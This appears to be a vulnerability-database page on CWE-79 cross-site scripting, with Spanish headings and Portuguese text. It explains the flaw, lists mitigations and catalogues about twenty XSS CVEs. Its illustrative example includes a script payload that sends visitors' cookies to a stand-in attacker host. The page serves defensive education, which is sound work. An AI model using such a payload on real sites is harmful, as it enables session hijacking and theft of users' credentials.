Fallos del tipo CWE-79

28.827 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24330—Funnel Builder by CartFlows < 1.6.13 - Authenticated Stored XSS via FB Pixel ID and Google Analytics IDEPSS 0.7%CVE-2022-4840HIGHCross-site Scripting (XSS) - Stored in usememos/memosEPSS 0.7%CVE-2020-15083MEDIUMReflected XSS when uploading an image in the Product page in PrestaShopEPSS 0.7%CVE-2021-24331—Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSSEPSS 0.7%CVE-2023-32070CRITICALImproper Neutralization of Script in Attributes in XWiki (X)HTML renderersEPSS 0.7%CVE-2021-45071MEDIUMCross-site scripting (XSS) issue Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbEPSS 0.7%CVE-2022-4695HIGHCross-site Scripting (XSS) - Stored in usememos/memosEPSS 0.7%CVE-2024-55074HIGHThe edit profile function of Grocy through 4.3.0 allows stored XSS and resultant privilege escalation by uploading a crafted HTML or SVG filEPSS 0.7%CVE-2022-1530LOWCross-site Scripting (XSS) in livehelperchat/livehelperchatEPSS 0.7%CVE-2025-25304MEDIUMVega allows Cross-site Scripting via the vlSelectionTuples functionEPSS 0.7%CVE-2022-31889MEDIUMCross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533EPSS 0.7%CVE-2024-9414HIGHCross-site Scripting vulnerability in LCDS LAquis SCADAEPSS 0.7%CVE-2023-33195MEDIUMCraft CMS XSS in RSS widget feedEPSS 0.7%CVE-2026-39846CRITICALSiYuan affected by Remote Code Execution in the Electron desktop client via stored XSS in synced table captionsEPSS 0.7%CVE-2024-37304MEDIUMNuGetGallery's Markdown Autolinks Processing Vulnerable to Cross-site ScriptingEPSS 0.7%CVE-2022-23458MEDIUMToast UI Grid vulnerable to Cross-site scriptingEPSS 0.7%CVE-2026-33067MEDIUMSiYuan has Stored XSS to RCE via Unsanitized Bazaar Package MetadataEPSS 0.7%CVE-2024-0611MEDIUMMaster Slider – Responsive Touch Slider <= 3.9.9 - Authenticated(Editor+) Stored Cross-Site Scripting via slider callbackEPSS 0.7%CVE-2021-24682—Cool Tag Cloud < 2.26 - Contributor+ Stored Cross-Site ScriptingEPSS 0.7%CVE-2021-24672—One User Avatar < 2.3.7 - Contributor+ Stored Cross-Site ScriptingEPSS 0.7%